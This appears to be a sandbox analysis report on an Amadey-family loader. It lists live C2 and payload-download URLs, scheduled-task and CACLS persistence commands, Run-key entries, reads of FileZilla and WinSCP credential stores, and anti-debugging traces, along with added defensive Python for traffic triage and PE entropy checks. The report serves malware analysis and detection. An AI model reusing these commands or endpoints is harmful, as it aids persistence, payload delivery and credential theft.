Summary | ZeroBOX

nppshell.exe

Tags: Generic Malware, Malicious Library, Antivirus, UPX, Malicious Packer, BMP Format, PE File, PE64, DLL, OS Processor Check, JPEG Format, PE32
Category Machine Started Completed
FILE s1_win7_x6403_us Dec. 10, 2022, 2:43 p.m. Dec. 10, 2022, 2:45 p.m.
Size 301.2KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 45a95da55d4eb1e4d7f8d08f52e1f0ee
SHA256 e83cc90eaa0bafe3145cdc992932ac30a1e652a7db32c675fb2d2690b2b1df78
CRC32 0F24FE48
ssdeep 6144:YMzOWna0dbZdKWXmBeirnD1Pz/+AcxZgyAb3plR:YM0EZdn2BJbJz/gxpArrR
PDB Path C:\users\admin\source\repos\restOfLopping\Release\restOfLopping.pdb
Yara
  • IsPE32 - (no description)
  • OS_Processor_Check_Zero - OS Processor Check
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
ripple-wells-2022.net 188.93.233.243
IP Address Status Action
188.93.233.243 Active Moloch
164.124.101.2 Active Moloch
45.159.188.118 Active Moloch
85.209.135.109 Active Moloch
89.22.236.225 Active Moloch

Suricata Alerts

Identical alerts are collapsed; Count is the number of times each one fired.

Flow  SID  Signature  Category  Count
TCP 192.168.56.103:49172 -> 85.209.135.109:80  2027700  ET MALWARE Amadey CnC Check-In  Malware Command and Control Activity Detected  1
TCP 188.93.233.243:80 -> 192.168.56.103:49173  2014819  ET INFO Packed Executable Download  Misc activity  3
TCP 188.93.233.243:80 -> 192.168.56.103:49173  2018959  ET POLICY PE EXE or DLL Windows file download HTTP  Potential Corporate Privacy Violation  1
TCP 188.93.233.243:80 -> 192.168.56.103:49173  2016538  ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download  Potentially Bad Traffic  1
TCP 192.168.56.103:49180 -> 45.159.188.118:80  2024897  ET USER_AGENTS Go HTTP Client User-Agent  Misc activity  4
TCP 192.168.56.103:49171 -> 85.209.135.109:80  2027250  ET INFO Dotted Quad Host DLL Request  Potentially Bad Traffic  1
TCP 85.209.135.109:80 -> 192.168.56.103:49171  2014819  ET INFO Packed Executable Download  Misc activity  1
TCP 85.209.135.109:80 -> 192.168.56.103:49171  2018959  ET POLICY PE EXE or DLL Windows file download HTTP  Potential Corporate Privacy Violation  1
TCP 85.209.135.109:80 -> 192.168.56.103:49171  2016538  ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download  Potentially Bad Traffic  1

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA (49 calls with identical arguments and results, collapsed here)

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent (4 calls with identical results, collapsed here)

0 0
Time & API Arguments Status Return Repeated

The single-character WriteConsoleA calls below are collapsed into the strings they spell; the console output belongs to the schtasks.exe and cacls.exe children, and spaces and punctuation were not captured by the trace.

WriteConsoleW

buffer: SUCCESS: The scheduled task "gntuud.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA (12 calls, one character each)

buffer: A r e y o u s u r e Y N
(the CACLS confirmation prompt "Are you sure (Y/N)?", raised by the first CACLS "gntuud.exe" /P "test22:N" and answered by the piped echo Y)
console_handle: 0x00000007
1 1 0

WriteConsoleA (13 calls, one character each)

buffer: p r o c e s s e d f i l e
(CACLS output "processed file:")
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA (13 calls, one character each)

buffer: p r o c e s s e d f i l e
(CACLS output "processed file:" from the second invocation, /P "test22:R" /E, which edits the ACL and so does not prompt)
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA (9 calls, one character each; the trace ends here)

buffer: A r e y o u s u r
(start of the prompt from the third CACLS, on the directory ..\03bd543fce)
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey (47 calls, collapsed here; every call has the same arguments apart from crypto_handle)

buffer: <INVALID POINTER>
crypto_handle: 0x004ba708 (1 call), 0x004ba788 (6), 0x004bb008 (6), 0x004ba8c8 (10), 0x004bb0c8 (1), 0x004ba948 (14), 0x004bac88 (9)
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6 (PUBLICKEYBLOB)
1 1 0

A NULL output buffer together with a successful return is the CryptoAPI length-query convention (the caller asks how large the blob would be before allocating), so these calls show repeated public-key handling on seven key handles, not an export of private key material.
pdb_path C:\users\admin\source\repos\restOfLopping\Release\restOfLopping.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .00cfg
Time & API Arguments Status Return Repeated

Three exceptions were recorded. All carry exception_code 0x80000004 (EXCEPTION_SINGLE_STEP, the trap-flag single-step exception) and all are raised inside the dropped payload modules (avicapn32.exe, syncfiles.dll, cred64.dll) rather than in nppshell.exe. In the first two the bytes at the faulting address decode to nop / push ebx / pushfd, i.e. the code reads EFLAGS right after the trap. That is the shape of a trap-flag debugger check: an attached debugger consumes the single-step exception and the program's own handler never runs, which is what the check detects. Treat these as anti-analysis, not crashes.

__exception__

stacktrace:
avicapn32+0xad7b93 @ 0xe17b93
GetEnvironmentVariableA+0x18 VerifyConsoleIoHandle-0xc5 kernel32+0x133b8 @ 0x757f33b8

exception.instruction_r: 90 53 9c bb 6a 02 c1 54 53 66 c1 a4 1c 96 fd 3e
exception.symbol: avicapn32+0xa699bc
exception.instruction: nop
exception.module: avicapn32.exe
exception.exception_code: 0x80000004
exception.offset: 10918332
exception.address: 0xda99bc
registers.esp: 17692104
registers.edi: 3407872
registers.eax: 845448827
registers.ebp: 17694128
registers.edx: 102
registers.ebx: 0
registers.esi: 0
registers.ecx: 784896
1 0 0

__exception__

stacktrace:
rundll+0x61b975 syncfiles+0x61c981 @ 0x1061c981
0x2af59c
0x1

exception.instruction_r: 90 53 9c bb 26 47 bd 13 c1 eb 25 0f 84 f2 ff ff
exception.instruction: nop
exception.exception_code: 0x80000004
exception.symbol: rundll+0xb08a9c syncfiles+0xb09aa8
exception.address: 0x10b09aa8
registers.esp: 2813292
registers.edi: 268435456
registers.eax: 1512113082
registers.ebp: 2815316
registers.edx: 112
registers.ebx: 0
registers.esi: 0
registers.ecx: 784896
1 0 0

__exception__

stacktrace:
Save+0x898403 cred64+0x8b2c9b @ 0x2be2c9b
0x28f63c

exception.instruction_r: 90 e8 06 b4 ec ff 81 ed 04 00 00 00 66 23 c7 1a
exception.instruction: nop
exception.exception_code: 0x80000004
exception.symbol: Save+0x9ae1e7 cred64+0x9c8a7f
exception.address: 0x2cf8a7f
registers.esp: 2682392
registers.edi: 36896768
registers.eax: 3212885123
registers.ebp: 2684416
registers.edx: 118
registers.ebx: 0
registers.esi: 24
registers.ecx: 784896
1 0 0
Suspicious HTTP requests (deduplicated; method, URL, and the features the sandbox flagged)

POST http://85.209.135.109/jg94cVd30f/index.php?scr=1  POST with no Referer header, POST with no User-Agent header, connection to IP address
POST http://85.209.135.109/jg94cVd30f/index.php  POST with no Referer header, POST with no User-Agent header, connection to IP address
GET http://ripple-wells-2022.net/n8exrcvvse1m2/Emit64.exe  GET with no User-Agent header
GET http://ripple-wells-2022.net/n8exrcvvse1m2/avicapn32.exe  GET with no User-Agent header
GET http://45.159.188.118/bot/online?guid=test22-PC\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34  connection to IP address
GET http://45.159.188.118/bot/regex?key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34  connection to IP address
GET http://85.209.135.109/jg94cVd30f/Plugins/cred64.dll  GET with no User-Agent header, connection to IP address

Requests in the order recorded: POST index.php?scr=1, POST index.php, GET Emit64.exe, GET avicapn32.exe, GET /bot/online, GET /bot/regex, GET Plugins/cred64.dll, then POST index.php?scr=1 and POST index.php again after the plugin download. The two POST endpoints on 85.209.135.109 are the ones Suricata matched as Amadey CnC check-in, and the /bot/online query string carries the sandbox's computer name and user name (guid=test22-PC\test22) alongside a 64-hex-character key, so both values are host identifiers rather than random tokens.
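The features the sandbox attached to these requests (no User-Agent, no Referer, dotted-quad host, executable fetched over plain HTTP, host identifier in the query) are the same ones a proxy-log hunt can key on. The following Python is an added example, not code from the ZeroBOX report or from the sample: it scores constructed request records built from the URLs above, assuming the header values the page does not reproduce (User-Agent absent where the report says so, and the stock "Go-http-client/1.1" string for the 45.159.188.118 requests that the Suricata rule flagged), and collects the hosts and URLs of the flagged requests.

```python
"""Heuristic triage of HTTP requests for loader check-in and second-stage
download traffic of the kind recorded on this page.

Added example; not code from the ZeroBOX report or from the sample.  The
request records are constructed from the URLs on this page.  Header values
are assumptions: the report only says User-Agent/Referer were absent, and the
Go client's User-Agent is taken as the stock "Go-http-client/1.1" string."""
import ipaddress
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class HttpRequest:
    method: str
    url: str
    headers: dict = field(default_factory=dict)


def host_is_ip(host):
    """True when the host part is a bare IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def score_request(req):
    """Return the list of suspicious features a single request exhibits."""
    u = urlsplit(req.url)
    hdr = {k.lower(): v for k, v in req.headers.items()}
    path = u.path.lower()
    feats = []
    if host_is_ip(u.hostname or ""):
        feats.append("dotted-quad host")
    if "user-agent" not in hdr:
        feats.append("no User-Agent")
    elif hdr["user-agent"].startswith("Go-http-client/"):
        feats.append("Go HTTP client User-Agent")
    if req.method == "POST" and "referer" not in hdr:
        feats.append("POST without Referer")
    if req.method == "POST" and path.endswith("/index.php"):
        feats.append("POST to */index.php")          # check-in shape seen in this report
    if u.scheme == "http" and path.endswith((".exe", ".dll")):
        feats.append("executable over cleartext HTTP")
    if "guid=" in u.query and "key=" in u.query:
        feats.append("host identifier in query string")
    return feats


def triage(requests, min_features=2):
    """Map each URL to its features and a flag set at min_features or more."""
    verdicts = {}
    for req in requests:
        feats = score_request(req)
        verdicts[req.url] = {"method": req.method, "features": feats,
                             "flag": len(feats) >= min_features}
    return verdicts


def network_iocs(requests, min_features=2):
    """Hosts and URLs of flagged requests, ready for a blocklist or a hunt query."""
    hosts, urls = set(), set()
    for url, verdict in triage(requests, min_features).items():
        if verdict["flag"]:
            urls.add(url)
            hosts.add(urlsplit(url).hostname)
    return {"hosts": sorted(hosts), "urls": sorted(urls)}


GO_UA = {"User-Agent": "Go-http-client/1.1"}   # assumed; the page does not reproduce it
BOT_KEY = "afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34"

# Constructed from the request list on this page (raw string keeps the backslash in guid=).
SAMPLE_REQUESTS = [
    HttpRequest("POST", "http://85.209.135.109/jg94cVd30f/index.php?scr=1"),
    HttpRequest("POST", "http://85.209.135.109/jg94cVd30f/index.php"),
    HttpRequest("GET", "http://ripple-wells-2022.net/n8exrcvvse1m2/Emit64.exe"),
    HttpRequest("GET", "http://ripple-wells-2022.net/n8exrcvvse1m2/avicapn32.exe"),
    HttpRequest("GET", r"http://45.159.188.118/bot/online?guid=test22-PC\test22&key=" + BOT_KEY, GO_UA),
    HttpRequest("GET", "http://45.159.188.118/bot/regex?key=" + BOT_KEY, GO_UA),
    HttpRequest("GET", "http://85.209.135.109/jg94cVd30f/Plugins/cred64.dll"),
    # Benign control: a browser download with ordinary headers over TLS.
    HttpRequest("GET", "https://example.org/downloads/tool.exe",
                {"User-Agent": "Mozilla/5.0", "Referer": "https://example.org/downloads/"}),
]

if __name__ == "__main__":
    for url, v in triage(SAMPLE_REQUESTS).items():
        print("FLAG" if v["flag"] else "    ", v["method"], url, "|", ", ".join(v["features"]))
    print(network_iocs(SAMPLE_REQUESTS))
```

A threshold of two features keeps the plain-domain executable downloads (Emit64.exe, avicapn32.exe) in scope while the benign control, a browser download with a User-Agent and Referer over TLS, scores nothing; tune min_features against your own proxy logs before alerting on it.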
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory / NtAllocateVirtualMemory (50 calls, collapsed here by process). Every call targets the calling process itself (process_handle 0xffffffff) with protection 64 (PAGE_EXECUTE_READWRITE), stack_dep_bypass 0 and stack_pivoted 0, and returns Status 1, Return 0.

PID 1280  NtProtectVirtualMemory  base_address 0x002e0000  length 274432  heap_dep_bypass 1
PID 1488  NtProtectVirtualMemory  base_address 0x00360000  length 274432  heap_dep_bypass 1
PID 2244  NtAllocateVirtualMemory x2  region_size 4096  allocation_type 12288 (MEM_COMMIT|MEM_RESERVE)  heap_dep_bypass 0  base_address 0x00230000, 0x00240000
PID 2388  NtProtectVirtualMemory x5  length 4096  heap_dep_bypass 0  base_address 0x10433000, 0x758f1000, 0x73f71000, 0x74490000, 0x73151000
PID 2388  NtAllocateVirtualMemory x8  region_size 4096  allocation_type 12288 (MEM_COMMIT|MEM_RESERVE)  heap_dep_bypass 0  base_address 0x00770000, 0x00780000, 0x00790000, 0x007a0000, 0x007c0000, 0x007d0000, 0x007e0000, 0x007f0000
PID 1268  NtAllocateVirtualMemory  region_size 4096  allocation_type 4096 (MEM_COMMIT)  heap_dep_bypass 0  base_address 0x006b0000
PID 3008  NtAllocateVirtualMemory  region_size 2293760  allocation_type 8192 (MEM_RESERVE)  heap_dep_bypass 0  base_address 0x02790000
PID 3008  NtProtectVirtualMemory x2  heap_dep_bypass 0  base_address 0x72811000 (length 4096), 0x72812000 (length 8192)
PID 3008  NtAllocateVirtualMemory x29  allocation_type 4096 (MEM_COMMIT)  heap_dep_bypass 1  region_size 4096 (8192 for 0x02982000)  base_address 0x02980000, 0x0249a000, 0x02492000, 0x024a2000, 0x02981000, 0x02982000, 0x0250a000, 0x024a3000, 0x024a4000, 0x0251b000, 0x02517000, 0x0249b000, 0x02502000, 0x02515000, 0x024a5000, 0x0250c000, 0x02720000, 0x024a6000, 0x0251c000, 0x02503000, 0x02504000, 0x02505000, 0x02506000, 0x02507000, 0x02508000, 0x02509000, 0x02880000, 0x02881000, 0x02882000

Two patterns matter for follow-up. The 274432-byte (0x43000) regions made RWX in one call in PIDs 1280 and 1488 are what an unpacking stub does before writing its payload, so those are the regions to dump first. The 0x7xxxxxxx pages re-protected in PIDs 2388 and 3008 lie where system DLLs are mapped on 32-bit Windows 7, so RWX there means loaded library code was rewritten in place (hooks or import fixups); compare those pages against the on-disk modules in a memory image.
description gntuud.exe tried to sleep 191 seconds, actually delayed analysis time by 191 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 2406921
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 9858748416
root_path: C:\Users
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Local\Temp\SETUP_30094\00001#Success.potm
file C:\Users\test22\AppData\Local\Temp\SETUP_30094\00002#Wikipedia.potm
file C:\Users\test22\AppData\Local\Temp\SETUP_30094\00000#Fireplace.potm
file C:\Users\test22\AppData\Local\Temp\SETUP_30094\Engine.exe
file C:\Users\test22\AppData\Roaming\1000020000\umciavi64.exe
file C:\Users\test22\AppData\Roaming\1000021000\umciavi32.exe
file C:\Users\test22\AppData\Roaming\c33e9ad058e5d3\cred64.dll
file C:\Users\test22\1000019012\syncfiles.dll
file C:\Users\test22\1000018002\avicapn32.exe
file C:\Users\test22\AppData\Local\Temp\1000017001\Emit64.exe
file C:\Users\test22\AppData\Local\Temp\kak1dt10.3sz\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
cmdline powershell get-process avastui
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\03bd543fce" /P "test22:N"&&CACLS "..\03bd543fce" /P "test22:R" /E&&Exit
cmdline C:\Windows\system32\cmd.exe /c cmd < Fireplace.potm
file C:\Users\test22\AppData\Local\Temp\1000017001\Emit64.exe
file C:\Users\test22\1000018002\avicapn32.exe
file C:\Users\test22\AppData\Roaming\1000020000\umciavi64.exe
file C:\Users\test22\AppData\Roaming\1000021000\umciavi32.exe
file C:\Users\test22\AppData\Local\Temp\SETUP_30094\Engine.exe
file C:\Users\test22\AppData\Roaming\1000020000\umciavi64.exe
file C:\Users\test22\AppData\Roaming\c33e9ad058e5d3\cred64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\03bd543fce" /P "test22:N"&&CACLS "..\03bd543fce" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000017001\Emit64.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000017001\Emit64.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\1000018002\avicapn32.exe
parameters:
filepath: C:\Users\test22\1000018002\avicapn32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\1000019012\syncfiles.dll, rundll
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\1000020000\umciavi64.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\1000020000\umciavi64.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\1000021000\umciavi32.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\1000021000\umciavi32.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3060
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x00320000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZ...PE [binary PE image rendered as text; byte dump omitted. Recoverable strings: DOS stub "This program cannot be run in DOS mode."; PE signature followed by "d†" (bytes 0x64 0x86, Machine 0x8664, x64)]
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZ...PE [binary PE image rendered as text; byte dump omitted. Recoverable strings: DOS stub "This program cannot be run in DOS mode."; PE signature followed by "L" (byte 0x4c, Machine 0x014c, x86); section names .text .rdata .data .idata .n3DK0 .symtab .n3DK1 .n3DK2 .n3DK3 .reloc .rsrc; Go build ID: "1XoObtThoSIQHB6rxJ2Y/4S4zZYswWvya58Ng_HPC/svauRJsvdL7i5fW18Myu/93NVhBdX9dg_MUSFHSGe" (the .symtab section and the build ID string mark a Go-linked binary)]
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZ...PE [binary PE image rendered as text; byte dump omitted. Recoverable strings: DOS stub "This program cannot be run in DOS mode."; PE signature followed by "L" (byte 0x4c, Machine 0x014c, x86); section names not readable in the dump]
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZP...PE [binary PE image rendered as text; byte dump omitted. Recoverable strings: "MZP" header and DOS stub "This program must be run under Win32" (Borland/Delphi linker stub); PE signature followed by "L" (byte 0x4c, Machine 0x014c, x86)]
request_handle: 0x00cc0018
1 1 0

InternetReadFile

buffer: MZP...PE [binary PE image rendered as text; byte dump omitted. Recoverable strings: "MZP" header and DOS stub "This program must be run under Win32" (Borland/Delphi linker stub); the string "EAGNVEZQGKAWCNHUVZUXOPPBYQUJWFGAMROJKHSZPZDZXVLKEWBECPBBEIJOFCYS" between the stub and the PE signature; PE signature followed by "L" (byte 0x4c, Machine 0x014c, x86); section names CODE DATA BSS .idata .tls .rdata .reloc .rsrc; Delphi RTTI type names Cardinal, String, TObject]
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZ...PE [binary PE image rendered as text; byte dump omitted. Recoverable strings: DOS stub "This program cannot be run in DOS mode."; PE signature followed by "d†" (bytes 0x64 0x86, Machine 0x8664, x64)]
request_handle: 0x00cc000c
1 1 0
section name: .text virtual_address: 0x00001000 virtual_size: 0x0004690b size_of_data: 0x00046a00 entropy: 7.488313592366181 description A section with a high entropy has been found
entropy 0.959252971138 description Overall entropy of this PE file is high
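The two checks the report applies to the executables above can be reproduced with a short standard-library PE reader: per-section Shannon entropy (the 7.49 figure for .text) and image identification from the raw InternetReadFile buffers (MZ/PE magic, Machine field, MSVC versus Delphi DOS stub, Go build ID string). This is an added example, not code from the sandbox or from the sample; the image it parses by default is constructed inside the block by build_sample_pe() and the Go build ID it carries is made up. Pass a real file path as the first argument to run it on a dropped binary.

```python
"""Added example (not part of the sandbox report): parse a PE section table,
compute per-section entropy, and identify the image the way the report's
InternetReadFile buffers can be read by eye. The default input is a
CONSTRUCTED minimal PE built below; its build ID string is not real."""
import math
import random
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
MSVC_STUB = b"This program cannot be run in DOS mode."
DELPHI_STUB = b"This program must be run under Win32"
GO_BUILD_ID = b'Go build ID: "'


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in 0..8; packed or encrypted sections sit near 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def go_build_id(image: bytes):
    """Return the quoted build ID the Go linker embeds, or None."""
    i = image.find(GO_BUILD_ID)
    if i < 0:
        return None
    start = i + len(GO_BUILD_ID)
    end = image.find(b'"', start)
    return image[start:end].decode("ascii", "replace") if end > start else None


def parse_pe(image: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew")
    coff = e_lfanew + 4  # IMAGE_FILE_HEADER, 20 bytes
    machine, nsect, _ts, _sym, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", image, coff)
    table = coff + 20 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(nsect):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", image, table + i * 40)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": vaddr, "virtual_size": vsize, "size_of_data": rawsize,
            "entropy": shannon_entropy(image[rawptr:rawptr + rawsize]),
        })
    arch = {IMAGE_FILE_MACHINE_I386: "x86", IMAGE_FILE_MACHINE_AMD64: "x64"}.get(machine, hex(machine))
    return {"arch": arch, "sections": sections, "overall_entropy": shannon_entropy(image),
            "msvc_stub": MSVC_STUB in image, "delphi_stub": DELPHI_STUB in image,
            "go_build_id": go_build_id(image)}


def high_entropy_sections(info: dict, threshold: float = 7.0) -> list:
    """Section names above the threshold; the report flags .text at 7.49."""
    return [s["name"] for s in info["sections"] if s["entropy"] > threshold]


def build_sample_pe(machine: int, sections: list, trailer: bytes = b"") -> bytes:
    """CONSTRUCTED minimal image: enough header for parse_pe, not a loadable binary."""
    e_lfanew = 0x40 + len(MSVC_STUB)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew) + MSVC_STUB
    coff = struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0, 0, 0)  # no optional header
    raw_ptr = e_lfanew + 4 + 20 + 40 * len(sections)
    table, raw, vaddr = b"", b"", 0x1000
    for name, data in sections:
        table += struct.pack("<8sIIII", name.ljust(8, b"\0"), len(data), vaddr, len(data), raw_ptr) + b"\0" * 16
        raw_ptr += len(data)
        vaddr += 0x1000
        raw += data
    return dos + b"PE\0\0" + coff + table + raw + trailer


_rng = random.Random(2022)
SAMPLE_TEXT = bytes(_rng.getrandbits(8) for _ in range(4096))  # stand-in for packed code
SAMPLE_RDATA = b"A" * 512 + b"\0" * 512                         # two symbols: exactly 1.0 bit/byte
SAMPLE_IMAGE = build_sample_pe(IMAGE_FILE_MACHINE_I386,
                               [(b".text", SAMPLE_TEXT), (b".rdata", SAMPLE_RDATA)],
                               trailer=b'\xff Go build ID: "constructed/not/real" \xff')

if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_IMAGE
    info = parse_pe(image)
    for s in info["sections"]:
        print(f"{s['name']:<8} va=0x{s['virtual_address']:08x} size=0x{s['size_of_data']:08x} entropy={s['entropy']:.3f}")
    print("arch:", info["arch"], "high-entropy:", high_entropy_sections(info), "go build id:", info["go_build_id"])
```

A 7.0 threshold on a code section is a packing heuristic, not proof; compressed resources and large string tables also score high, so read the result together with the section name and the overall-entropy line the report gives.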
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
host 45.159.188.118
host 85.209.135.109
host 89.22.236.225
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Emit64.exe reg_value C:\Users\test22\AppData\Local\Temp\1000017001\Emit64.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\avicapn32.exe reg_value C:\Users\test22\1000018002\avicapn32.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\syncfiles.dll reg_value rundll32 C:\Users\test22\1000019012\syncfiles.dll, rundll
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\umciavi64.exe reg_value C:\Users\test22\AppData\Roaming\1000020000\umciavi64.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\umciavi32.exe reg_value C:\Users\test22\AppData\Roaming\1000021000\umciavi32.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
Bkav W32.AIDetect.malware2
FireEye Generic.mg.45a95da55d4eb1e4
Elastic malicious (moderate confidence)
Kaspersky UDS:Trojan-Downloader.Win32.Deyma.gen
Avast FileRepMalware [Trj]
McAfee-GW-Edition Artemis
Kingsoft Win32.Troj.Undef.(kcloud)
Gridinsoft Trojan.Win32.Gen.bot
Microsoft Trojan:Win32/Sabsik.FL.B!ml
McAfee Artemis!45A95DA55D4E
AVG FileRepMalware [Trj]
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
cmdline CACLS "..\03bd543fce" /P "test22:N"
cmdline CACLS "gntuud.exe" /P "test22:R" /E
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\03bd543fce" /P "test22:N"&&CACLS "..\03bd543fce" /P "test22:R" /E&&Exit
cmdline cmd /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\03bd543fce" /P "test22:N"&&CACLS "..\03bd543fce" /P "test22:R" /E&&Exit
cmdline CACLS "..\03bd543fce" /P "test22:R" /E
cmdline CACLS "gntuud.exe" /P "test22:N"
Time & API Arguments Status Return Repeated

LdrGetProcedureAddress

ordinal: 0
function_address: 0x010dfc79
function_name: wine_get_version
module: ntdll
module_address: 0x778a0000
